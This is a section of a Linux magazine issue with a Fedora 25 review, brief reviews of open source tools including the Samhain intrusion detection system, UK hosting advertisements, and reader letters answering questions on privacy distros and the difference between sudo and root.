Moving into Fedora Workstation, arguably the biggest addition here is GNOME 3.22. There’s an abundance of subtle interface improvements, and we particularly like the all-new keyboard settings tool. For developers making changes on the fly, this is a helpful asset to have around. Window management has also seen some enhancements, and while cosmetically you’ll be hard pressed to really spot any differences, being able to multi-select files and systematically edit metadata through certain key bindings proves to be a big help. You’ll also now find decoding support for MP3 files, but this seemed to be hit-and-miss with its end results during our time with it. Thankfully, users can find alternatives for download through the software centre.

Fedora Server’s faithful Cockpit system has seen a variety of changes, with a new SELinux Troubleshooter module on hand to help diagnose problems. Due to the complexities of Server as a whole, this module is ideal for finding and fixing faults effortlessly. There were a few instances when we relied on SELinux to figure out an issue and it solved it with consummate ease. The jury is still out on how it’ll handle more advanced failures,

however. Dig a little deeper and users can also find admin support for SSH keys, enabling users to systematically track connected machines at any time. We did find some initial slowdown with this feature, but to our knowledge, this seems more a hardware fault than anything with the software itself. Fedora Atomic is an entirely new flavour for Fedora and first impressions are positive. There are ways throughout to help create and deploy container-based workloads, linking in well with the Docker integration mentioned previously. While this edition perhaps lacks the high-quality Fedora finish we’ve become accustomed to, a two-week update cycle is a surprising and welcome twist. We’ll reserve judgement until the first point updates have been released. We have to say that the Fedora team has seriously done a tremendous job here. Each of these editions has upped our expectations of what Fedora is capable of, and despite some small flaws, it certainly feels like a near-complete update. The premise of dropping Fedora Cloud and subbing in Fedora Atomic is a potentially risky move, but early signs are that Atomic is certainly up to scratch. If you’ve been biding your time to check out Fedora, now is the perfect time to do so. Beginner users should arguably start by using Workstation to get used to the nuances that Fedora offers, while advanced users should pick and choose the edition that suits them best. Oliver Hill

Pros Most new additions have dramatically improved the user experience, with bug fixes resolving previous problems.

Cons Integration of certain tools can be hit-and-miss and we’d love to see more crossover between the three distinct versions of Fedora 25.

Summary Core changes to the Fedora brand are fantastic and while none are perfect, each individual addition is certainly worth taking the time to check out.




Free software


0 A.D. Alpha 21 Ulysses

From Carthaginians to Romans, rewrite ancient history

If you ever doubt that the human race takes play seriously, take a look at the amount of hours that go into the collaborative development of open source games. Since the previously access-to-code-by-invitation game was relicensed under the GNU GPL in 2009, development has accelerated, and releases have been made regularly. 0 A.D. is still in alpha, but it’s very playable, and well worth investing a little time in, whether you like RTSes, or are just interested in this historic period. Unlike computing, calendars count from 1, and there was no year zero - hence the licence to adopt the name, and play a little fast and loose with history, where gameplay demands sacrifices in accuracy.

The interface lets you get straight to playing, with sensible defaults already selected, so that there is no need to make decisions about things you don’t yet understand. The in-game manual will also help to keep you going as you marshal resources, and build alliances, to try and emerge victorious on the Attic plains. Players need to keep on top of military campaigns and defence, while building up enough resources to advance from village to town – and eventually city – unlocking technological advances along the way.

Above You start with an acropolis, and resources nearby, but will you emulate the success of ancient Athens?

Pros Good graphics, sound, and game progression. Online multiplayer options. Regular improvements and updates.

Cons A lot of yet-to-be implemented features, so you may be playing Age of Empires for a little while yet.

Great for…
Having fun while pretending to be learning history




Quil 2.5.0

Art from code, and it can run in your browser, too

Normally we have a screenshot for graphics apps that we review, but since Quil is a library for interactive drawings and animations, the page won’t bring them to life as well as you visiting the project’s homepage or, better yet, running the software. Why would you? Well, Quil mixes Processing – an artist-friendly API – with Clojure, a language so hot that you’re seriously running out of excuses not to at least give it a try. Real soon. As with all things Clojure, Lein makes for the simplest of installs – lein new quil my-sketch, then open the generated core.clj file up in your favourite Clojure-friendly editor (Emacs or Light Table), and evaluate the file. The website is full of examples, as


well as links to tutorials, and a chance to try online. Speaking of online, Quil also works with ClojureScript (using Processing.js), so sketches can be run directly in your web browser. If you know Processing, it’s a little disconcerting to see it getting an attack of the parentheses to fit the Clojure world, but the examples are helpful here in getting you acclimatised – try Grey Circles on Quil’s GitHub page. Quil can be expanded with middleware, such as Navigation 3D, which allows shooter-like navigation through 3D spaces. Sketches can also be made into runnable jars, for carrying to anywhere running the JVM. Fun and useful, what more could you want?

Pros Update functions (and therefore animations) without restarting; make art from maths!

Cons It’s not pure Processing, and

Clojure is a big shock to newbies (until they love it!).

Great for…

Enlivening presentations and pepping up websites


Samhain 4.2.0

Don’t rely on luck to protect your servers - install a host-based intrusion detection system

Security - you know you need it, but something always gets in the way. If you have one, two or a handful of VPSes, and perhaps an internet-facing server or two at home – don’t forget to count that Raspberry Pi project - you’ll have at least thought about security, probably even have a firewall, and maybe even do daily software updates, but you’ll have been far too busy to get serious about Intrusion Detection software. Well, stop prevaricating, postponing and procrastinating, and take a look at Samhain. One of the best host-based intrusion detection systems (HIDS), Samhain sits stealthily on your system monitoring packets and detecting file modifications – as well as searching for rootkits

and detecting rogue SUID executables. It can run as a standalone monitor on a single server, or monitor multiple hosts, logging centrally – with all logs sent signed and encrypted, naturally. Packages are in most repositories, but distros may have compiled Samhain without a feature you need, so consider downloading the source; Samhain provides instructions for checking its integrity. Dependencies are minimal for reasons of security, but it makes for an easy compile. The real work starts when you open /etc/samhainrc in your favourite editor: time to read through the weighty manual. The terse man page is a useful guide to many parts of Samhain, including running in stealth mode, with config hidden by steganography.

Pros Powerful and flexible intrusion detection system; the only serious rival to OSSEC.

Cons To get the most from it you’ll have to spend a lot of time reading the comprehensive manual.

Great for…

Anyone who wants to stop worrying about their server and sleep soundly!


lterm 1.4.1

Manage all of your remote terminal sessions with lterm

If you regularly shell into remote machines, but are not using a tool for transparent sessions across networks like MC or Emacs’ TRAMP mode, then you may be fed up with remembering log-in details and the extra work involved in file transfers. Enter lterm, a terminal emulator based on VTE with plenty of features to make your life easier. As well as the standard bells and whistles of tabbed sessions, working remotely (SSH, SFTP, or even Telnet) is facilitated by bookmarks, encrypted password saving (and authentication by key), and remote file and directory management. X11 forwarding can also be carried out over SSH sessions. There are some editing features, and plenty of configuration options, such as customised mouse behaviour, for those with a particular way of working. Additionally, users can send the same commands to clusters of remote servers or local desktop sessions – which is also an excellent way to step through parts of a shell script for careful testing of its effects on your servers. Very useful. Fairly regular releases, with attention to bug fixes as well as new features, mean users can be confident that time invested in this app will not be squandered.

Above lterm takes the pain out of remote working, giving you the best features of command line and GUI

Pros Combines a good basic terminal client with convenient, time-saving features for working across networks.

Cons It’ll never be as powerful as working across machines from Emacs, MC, etc – but does it need to be?

Great for…

Anyone with a remote session from VPS to Raspberry Pi.



Get your listing in our directory To advertise here, contact Luke | +44 (0)1202 586431


Hosting listings

Featured host: 0845 527 9345

About us

Cyber Host Pro are committed to providing the best cloud server hosting in the UK; we are obsessed with automation and have been since our doors opened 15 years ago! We’ve grown year on year and love our solid, growing customer base, who trust us to keep their business’s cloud online!

What we offer

• Cloud VPS Servers – scalable cloud servers with optional cPanel or Plesk control panel.
• Reseller Hosting – sell web and email hosting to your clients; both Windows and Linux hosting available.
• Dedicated Servers – having your own dedicated server will give you maximum performance; our UK servers typically include same-day activation.
• Website Hosting – all of our web hosting plans host on 2015/16 SSD Dell servers, giving you the fastest hosting available!

If you’re looking for a hosting provider who will provide you with the quality you need to help your business grow, then contact us to see how we can help you and your business! We’ve got a vast range of hosting solutions, including reseller hosting and server products for all business sizes.


5 Tips from the pros


Optimise your website images When uploading your website to the internet, make sure all of your images are optimised for the web! Try using software, or if you’re using WordPress, install the EWWW Image Optimizer plugin.


Host your website in the UK Make sure your website is hosted in the UK, and not just for legal reasons! If your server is overseas you may be missing out on search engine rankings – you can check where your site is hosted on www.


Do you make regular backups? How would it affect your business if you lost your website today? It is important to always make your own backups; even if your host offers you a backup solution, it’s important to take responsibility for your own data.


Trying to rank on Google? Google made some changes in 2015. If you’re struggling to rank on Google, make sure that your website is mobile-responsive! Plus, Google now prefers secure (https) websites! Contact your host to set up and force https on your website.
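As a sketch of what “forcing https” involves on a typical shared Apache host (this assumes mod_rewrite is available – your host’s control panel may offer a simpler one-click switch, so ask them first), a .htaccess fragment might look like:

```apache
# Redirect all plain-HTTP requests to their HTTPS equivalent.
# Assumes mod_rewrite is enabled and an SSL certificate is already installed.
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
```

The permanent (301) redirect tells Google that the https address is the canonical one, which is what matters for ranking.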


Avoid cheap hosting We’re sure you’ve seen those TV adverts for domain and hosting for £1! Think about the logic... for £1, how many clients will be jam-packed onto that server? Surely they would use cheap £20 drives rather than £1k+ enterprise SSDs! Try to remember that you do get what you pay for!

Chris Michael “I’ve been using Cyber Host Pro to host various servers for the last 12 years. The customer support is excellent, they are very reliable and great value for money! I highly recommend them.” Glen Wheeler “I am a website developer, I signed up with Cyber Host Pro 12 years ago as a small reseller, 12 years later I have multiple dedicated and cloud servers with Cyber Host Pro, their technical support is excellent and I typically get 99.9-100% uptime each month” Paul Cunningham “Me and my business partner have previously had a reseller account with Cyber Host Pro for 5 years, we’ve now outgrown our reseller plan, Cyber Host Pro migrated us to our own cloud server without any downtime to our clients! The support provided to us is excellent, a typical ticket is replied to within 5-10 minutes! ”

Supreme hosting

0800 1 777 000

SSD Web hosting
0843 289 2681

CWCS Managed Hosting is the UK’s leading hosting specialist. They offer a fully comprehensive range of hosting products, services and support. Their highly trained staff are not only hosting experts, they’re also committed to delivering a great customer experience and passionate about what they do.

Since 2001 Bargain Host have campaigned to offer the lowest possible priced hosting in the UK. They have achieved this goal successfully and built up a large client database which includes many repeat customers. They have also won several awards for providing an outstanding hosting service.

• Colocation hosting • VPS • 100% Network uptime

Value hosting 02071 838250 ElasticHosts offers simple, flexible and cost-effective cloud services with high performance, availability and scalability for businesses worldwide. Their team of engineers provide excellent support around the clock over the phone, email and ticketing system.

Enterprise hosting: | 0800 808 5450 Formed in 1996, Netcetera is one of Europe’s leading web hosting service providers, with customers in over 75 countries worldwide. As the premier provider of data centre colocation, cloud hosting, dedicated servers and managed web hosting services in the UK, Netcetera offers an array of

services to effectively manage IT infrastructures. A state-of-the-art data centre enables Netcetera to offer your business enterprise-level solutions. • Managed and cloud hosting • Data centre colocation • Dedicated servers

• Cloud servers on any OS • Linux OS containers • World-class 24/7 support

Small business host 0800 051 7126 HostPapa is an award-winning web hosting service and a leader in green hosting. They offer one of the most fully featured hosting packages on the market, along with 24/7 customer support, learning resources, as well as outstanding reliability. • Website builder • Budget prices • Unlimited databases

• Shared hosting • Cloud servers • Domain names

Value Linux hosting 01642 424 237 Linux hosting is a great solution for home users, business users and web designers looking for cost-effective and powerful hosting. Whether you are building a single-page portfolio, or you are running a database-driven ecommerce website, there is a Linux hosting solution for you. • Student hosting deals • Site designer • Domain names

Budget hosting:

Fast, reliable hosting | +49 (0)9831 5050 Hetzner Online is a professional web hosting provider and experienced data centre operator. Since 1997 the company has provided private and business clients with high-performance hosting products as well as the necessary infrastructure for the efficient operation of websites. A combination of stable technology, attractive pricing

and flexible support and services has enabled Hetzner Online to continuously strengthen its market position both nationally and internationally. • Dedicated and shared hosting • Colocation racks • Internet domains and SSL certificates • Storage boxes

01904 890 890 Founded in 2002, Bytemark are “the UK experts in cloud & dedicated hosting”. Their manifesto includes in-house expertise, transparent pricing, free software support, keeping promises made by support staff and top-quality hosting hardware at fair prices. • Managed hosting • UK cloud hosting • Linux hosting



Your source of Linux news & views

Contact us…


Your letters

Questions and opinions about the mag, Linux, and open source

Above Make sure that you are the only one in full control by using sudo and su instead of root wherever possible

Above MOFO Linux is an Ubuntu-based distro for those who are concerned about surveillance and censorship

Privacy please

Dear Linux User, It strikes me that, given the recent introduction of the so-called ‘Snooper’s Charter’ in the UK, the frankly ridiculous data breaches at Yahoo et al, and the constant news stories surrounding hackers, you should talk more about how ordinary users can protect our private data from those who want to get their hands on it. Nice shiny versions of Linux like Apricity and elementary, as featured in your recent issue, are all very well, but can they stand up to a dedicated mischief-maker or state actor? I think not. Some guidance on Linux versions that can would be very much appreciated, not only by myself and others who are worried about our financial and data security, but for those in places where Big Brother’s watchful eye is a very real and present threat. Colin Farwig


Computer security has rarely been out of the news lately, which is why we decided to take an in-depth look at InfoSec this issue! But while our feature is packed with ways to lock down and test systems and networks, it’s geared more towards the sysadmins of the world and less to home users, who may not have either the time or the inclination to watch over logs and pen-test their own security strategies. Happily, there are some very good Linux distros out there that concentrate on privacy – the reason that we don’t include them on our disc is that, for maximum security, you are better off downloading and checking them yourself before installation. Tails is the best-known privacy-focused distro; Qubes OS is another – Edward Snowden apparently swears by it. MOFO Linux, meanwhile, is especially designed to counteract state surveillance and censorship, for those in countries where this is a concern. The good thing about the latter is that it’s Ubuntu-based, so it works smoothly and offers an easy learning curve, making it suitable for those who aren’t technically adept but still need to protect their privacy.

Who do sudo?

Hello Linux User team, I’m new to Linux, so forgive me if this is a stupid question, but what is the difference between sudo and root? I get that root is the equivalent of the Windows or Mac administrator account, the one that can do everything, but sudo seems to allow just as much power over commands, yet I often read things that say it’s better to sudo something rather than root it. Surely they both essentially do the same thing? And if root is the administrator account that has all the power, why would you not use that? In Windows if you are anything less than an administrator you basically have barely any control over the system at all, so why would you ever




Linux User & Developer

Above is the new home of our website and those of some of our sister magazines – explore its wealth of content today

choose to be in anything less than full control in Linux?
Sam Grange

When you’re coming from a Windows background it does seem counter-intuitive to deliberately avoid the user account that offers you the maximum amount of control, but there’s a very good reason that lots of Linux professionals do so: security. The root account is literally allowed control over everything in a Linux system, which sounds like a good idea but in practice means that other users of the computer (for example, co-workers on a corporate machine or your kids at home) have the opportunity to launch commands that you’re not aware of. Running a command with sudo (or multiple commands with su) means that you can take advantage of all the power of root when you need to, but that you’re not leaving the shell open, blindly set to root privileges – you need to reiterate that you have superuser access with sudo or su each time. This minimises the risk of unwanted,

irregular or just plain wrong commands being run as root and causing errors on your system. Security isn’t just about protecting yourself, your machine and your data from hackers – it’s also about protecting it against accidental misuse.
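To make the distinction concrete, here’s a minimal shell sketch; the package-manager commands are illustrative and commented out (substitute your own distro’s tools), and the `id` calls simply show which account you are currently acting as:

```shell
# Show who you currently are: 'id -u' prints your numeric user ID,
# which is 0 only when you are root.
id -un    # your user name
id -u     # your UID (0 = root)

# Run ONE privileged command, then automatically drop back to your
# own account (requires sudo to be configured for your user):
#   sudo apt update

# Run one command as root via su instead (prompts for root's password):
#   su -c 'apt update'

# Open a full root shell only when you genuinely need a series of
# root commands -- and leave it as soon as you're done:
#   su -
#   ...
#   exit
```

The point of the sketch is that `sudo` scopes root privilege to a single command, whereas a root shell stays privileged until you remember to `exit` it.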

Go go Gadget website

Hi there, For some time now I’ve found that every time I try to visit the Linux User & Developer website either via my bookmark or by typing in the address, I am sent somewhere else – to a site called I note that it seems to have content on it from Linux User & Developer along with many other interesting things, however I’m curious as to why I’m being taken there instead of to the Linux User & Developer site that I’m used to using. Please advise. Harry Rayson

The old incarnation of the Linux User & Developer website is no more – instead, several of our technology magazines now aggregate their website content through the website of our sister magazine Gadget. You’ll find a wealth of content from ourselves and our sister magazines Gadget, iCreate and Web Designer – it’s an Aladdin’s cave of tips, tutorials, hardware guides and so much more. The reason why the old website link automatically redirects you there is because it’s much more convenient for you if we just take you to the new home of the content you’re looking for, rather than manually redirecting you on the page or with new links inside the magazine. And aggregating all of the sites together gives you the opportunity to explore more content that you might find interesting, like the latest tech or a few clever tricks for working with Apple architecture or web design. Have a rummage around the site and you’ll find plenty of interesting stories, guides and more!


Free with your magazine

Instant access to these incredible free gifts…

The best distros and FOSS Essential software for your Linux PC

Professional video tutorials

The Linux Foundation shares its skills

Tutorial project files

All the assets you’ll need to follow our tutorials

Plus, all of this is yours too…

• Download Kali Linux, IPFire and Metasploitable and use them to test your security and access the FOSS in our feature

• Enjoy 20 hours of expert video tutorials from The Linux Foundation • Get the program code for our Linux and Raspberry Pi tutorials

Log in to Register to get instant access to this pack of must-have Linux distros and software, how-to videos and tutorial assets

Free for digital readers too!

Read on your tablet, download on your computer

The home of great downloads – exclusive to your favourite magazines from Imagine Publishing Secure and safe online access, from anywhere Free access for every reader, print and digital

An incredible gift for subscribers

Download only the files you want, when you want All your gifts, from all your issues, in one place

Get started Everything you need to know about accessing your FileSilo account


Follow the instructions on screen to create an account with our secure FileSilo system. Log in and unlock the issue by answering a simple question about the magazine.

Unlock every issue

Subscribe today & unlock the free gifts from more than 40 issues

Access our entire library of resources with a money saving subscription to the magazine – that’s hundreds of free resources


You can access FileSilo on any computer, tablet or smartphone device using any popular browser. However, we recommend that you use a computer to download content, as you may not be able to download files to other devices.


If you have any problems with accessing content on FileSilo take a look at the FAQs online or email our team at the address below

Over 20 hours of video guides

Essential advice from the Linux Foundation

The best Linux distros Specialist Linux operating systems

Free Open Source Software Must-have programs for your Linux PC

Head to page 32 to subscribe now

Already a print subscriber? Here’s how to unlock FileSilo today… Unlock the entire LU&D FileSilo library with your unique Web ID – the eight-digit alphanumeric code that is printed above your address details on the mailing label of your subscription copies. It can also be found on any renewal letters.

More than 400 reasons to subscribe

More added every issue


Available from all good newsagents and supermarkets






Industry interviews | Expert tutorials & opinion | Contemporary features | Behind the build DESIGN INSPIRATION





BUY YOUR ISSUE TODAY Print edition available at Digital edition available at Available on the following platforms

Linux Server Hosting from UK Specialists

24/7 UK Support • ISO 27001 Certified • Free Migrations

Managed Hosting • Cloud Hosting • Dedicated Servers

Supreme Hosting. Supreme Support.
